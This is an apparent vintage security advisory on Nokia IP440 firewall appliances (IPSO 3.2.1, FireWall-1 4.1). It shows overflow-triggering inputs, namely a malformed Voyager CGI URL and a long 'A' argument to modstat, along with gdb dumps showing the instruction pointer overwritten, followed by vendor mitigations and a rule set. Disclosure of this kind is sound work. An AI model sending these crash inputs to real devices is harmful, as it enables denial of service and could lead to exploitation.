COMMAND
Nokia firewalls
SYSTEMS AFFECTED
Nokia firewalls
PROBLEM
'K2' found the following. He unwrapped his shiny new Nokia IP440
integrated Firewall-1/IDS appliance and thought to give it a once
over. It appears to be an older FreeBSD kernel + some firewall
(Check Point 4.1) + some IDS (ISS) + remote admin (SSH/http).
Now these vulnerabilities all require an authenticated user;
however, it's still amazing that a device with security as its
primary function would have so many issues.
A request to its default http administration site...
http://127.0.0.1/cgi-bin/html_page?(Ax6000)&TEMPLATE=main
will result in "Html_gen exited because of signal: Segmentation
fault". After this, any attempt to connect to the site will
return, "Error while getting page: Couldn't connect to /tmp/xsets:
No such file or directory"
The /bin/xpand will die, dumping core in /var/tmp...
scrooge:/var/tmp# gdb -c xpand.core-11.27.2000-094458
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
Modified in 1997, 1998 by Nokia IP Inc.
There is absolutely no warranty for GDB; type "show warranty" for
details.
GDB 4.13 (i386-unknown-freebsd), Copyright 1994 Free Software
Foundation, Inc.
Core was generated by `xpand'.
Program terminated with signal 11, Segmentation fault.
#0 0x10046fb6 in ??
(41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
(gdb) file xpand-11.27.2000-094458
Reading symbols from xpand-11.27.2000-094458...done.
(gdb) bt
#0 0x10046fb6 in end
(41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
#1 0xefbfd3b8 in end
(41414141, 1004455c, efbfd3b4, 1004f060, 7cb40, 33b18, 0, efbfd3d4)
#2 0x10047110 in end
(7d380, 41414141, 1004f060, 36158, 33b18, efbfd3f0, 100446df, 7cb40)
#3 0x10044233 in end
(7cb40, 41414141, 41414141, 0, 1004f060, efbfd408, 1004416c, 5fec0)
#4 0x100446df in end
(5fec0, 41414141, 41414141, 1004f060, efbfd42c, 1004732e, 3a020,
efbfd444)
#5 0x1004416c in end
(3a020, efbfd444, 1004f060, 5fec0, 31680, 0, 56, efbfd44c)
#6 0x1004732e in end
(321a0, 10044144, efbfd444, 1004f060, 100446bc, 5fec0, efbfd46c,
10044713)
#7 0x100441ac in end
(332a0, 100446bc, 5fec0, efbfd4b0, 7f0c0, 0, efbfd65c, 21983)
#8 0x10044713 in end (31680, 10013, 17a7, 66000, 0, 0, 0, 0)
#9 0x21983 in handle_template_request (d=0x34000,
request=0x66000 "USER admin\n", 'A' <repeats 189 times>...,
request_len=6055, fd=9, fd_af=1, 1004f060, 40f40, 654b0) at
xcommit.c:1053
#10 0x22d6a in stream_set (
fdi=0x654a0, 1004f060, 1, 654b0, 0, 6b64632f, 62696c00, 40) at
xpand.c:179
#11 0x10041491 in end (0, 1, 0, 38000, efbfda60, 23354, 1, 0)
#12 0x10046ec0 in end (1, 0, efbfda88, efbfda84, 0, 654a0, 29000, d)
---Type <return> to continue, or q <return> to quit---
#13 0x23354 in main (argc=1, argv=0xefbfda88, efbfda90, 0, 0, 29000, 0,
1)
at xpand.c:385
(gdb) info reg
eax 0x41414141 1094795585
ecx 0x41414141 1094795585
edx 0x0 0
ebx 0x1004f060 268759136
esp 0xefbfd394 0xefbfd394
ebp 0xefbfd394 0xefbfd394
esi 0x7d380 512896
edi 0x41414141 1094795585
eip 0x10046fb6 0x10046fb6
ps 0x10206 66054
cs 0x1f 31
ss 0x27 39
ds 0xefbf0027 -272695257
es 0x80027 524327
(gdb)
also....
scrooge:/var/tmp# gdb -c html_gen.core
(gdb) info reg
eax 0x88dc 35036
ecx 0xfffffffc -4
edx 0x4949 18761
ebx 0x1009b060 269070432
esp 0xefbfaa74 0xefbfaa74
ebp 0xefbfaa84 0xefbfaa84
esi 0x0 0
edi 0x41414141 1094795585
eip 0x10084d1b 0x10084d1b
ps 0x10216 66070
cs 0x1f 31
ss 0x27 39
ds 0x27 39
es 0x27 39
(gdb)
also,
scrooge:/var/tmp# ./modstat -n
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Type Id Off Loadaddr Size Info Rev Module Name
modstat: LMSTAT: Bad file descriptor
Segmentation fault (core dumped)
(gdb) info reg
eax 0x4 4
ecx 0xefbfcfb8 -272642120
edx 0xefbfcfb8 -272642120
ebx 0x0 0
esp 0xefbfd354 0xefbfd354
ebp 0x41414141 0x41414141
esi 0xffffffff -1
edi 0x3 3
eip 0x41414141 0x41414141
This was tested with IPSO scrooge 3.2.1-fcs1 releng 849
11.24.1999-102644 i386 FW-1, 4.1 SP2.
SOLUTION
Nokia is aware of this issue. This is a bug; yes, it will be
fixed very quickly, but this is not a major vulnerability: you do
need a logon to the box. If this logon was obtained through
covert measures then you have bigger problems than this bug!
Recommendations:
1. Do not allow Voyager access from untrusted networks (e.g.
the Internet).
2. Use good generally accepted practice regarding password
selection and confidentiality (as always).
3. Consider disabling monitor (read-only administrator) access.
4. Use the provided SSH with port redirection (IPSO 3.2.1 and
earlier) or embedded SSL (IPSO 3.3 and later) to encrypt
http traffic to Voyager to prevent an attacker from
eavesdropping to hear the password.
A good FireWall-1 rule set to implement recommendations 1-4 might
look something like:
Source / Dest / Service / Action
--------------------------------------------------------------
admin-group / firewalls / [http,] ssh / Accept
management-console / firewalls / fw1-group / Accept
Any / firewalls / Any / Drop
The first rule permits administrative access. The second provides
FireWall-1 management access for the machine acting as the
management console (and is only referenced if Properties have
been modified to no longer accept FireWall-1 Control
Connections). The third excludes all other traffic directly to
the firewalls, and is referred to by Check Point as the "stealth
rule".
With these appropriate rules, an attacker must meet the criteria
established in your FireWall-1 security policy and then also be
authenticated as an administrator before he can attempt to attack
the Voyager-related processes.